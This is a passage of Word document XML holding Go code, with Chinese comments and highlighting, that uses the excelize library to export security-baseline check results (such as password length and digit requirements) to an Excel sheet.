        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F8AFA0" wp14:editId="56E17147">
            <wp:extent cx="5274310" cy="3347720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="60" name="图片 6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包含 文本&#10;&#10;描述已自动生成"/>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3347720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DFA8C" w14:textId="7EF7CFC3" w:rsidR="00665D05" w:rsidRDefault="00A37FD8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74128667" wp14:editId="54108100">
            <wp:extent cx="5274310" cy="164465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1644650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BD70A" w14:textId="77777777" w:rsidR="00A37FD8" w:rsidRDefault="00A37FD8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5397A4E9" w14:textId="065FBFF5" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func ExportExcel(o *types.Output) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E60DF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>f := excelize.NewFile()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7503D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00FA6017" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>defer func() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDE622" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00FA6017" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := f.Close(); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502AC7A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00FA6017" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F7D30" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00FA6017" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B929578" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA6017">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717D0052" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63824100" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sheetName_SettingsAndUser := "</w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1704768B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>f.SetSheetName("Sheet1", sheetName_SettingsAndUser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144684C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5861EF1E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>title := []string{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F44FD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA677C1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.SecondCheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CD26C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313152A0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B925A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A5273" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE9D1C2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>o.OutputTitle.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20B9FF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C4028" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7786142C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自增</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0CD6C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>row := 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895A8BD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407721EB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// Title </w:t>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D043F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRPr="00711432" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78B07D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D178FD0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF507B0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234BEB6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C850270" w14:textId="4E06D7A6" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, name, &amp;title)</w:t>
      </w:r>
      <w:r w:rsidR="00711432">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00711432" w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00711432" w:rsidRPr="00711432">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidR="00711432" w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里传入的是指针，可以传入</w:t>
      </w:r>
      <w:r w:rsidR="00711432" w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00711432" w:rsidRPr="00711432">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[]interface{} </w:t>
      </w:r>
      <w:r w:rsidR="00711432" w:rsidRPr="00711432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BB76F9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D02B10" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410E159" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A1F9B0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF48D0F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码复杂度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最小长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D45429" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD8F52" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_checkrule_merge_start := "A" + strconv.Itoa(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F602250" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_merge_start := "E" + strconv.Itoa(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26115BFD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_len_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302B562" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_len := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5141F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11A07C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Length.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146A0DE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Length.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D964D19" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Length.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1899DE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Length.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD38EB3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Length.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B163395" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Length.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5AAB4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332917B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, password_len_name, &amp;password_len)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26041093" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC98AB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979939D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7820D06A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE85F4E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码复杂度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求数字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D0348" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093DA18" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_num_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432284CA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_num := []interface{}{</w:t>
      </w:r>
    </w:p>
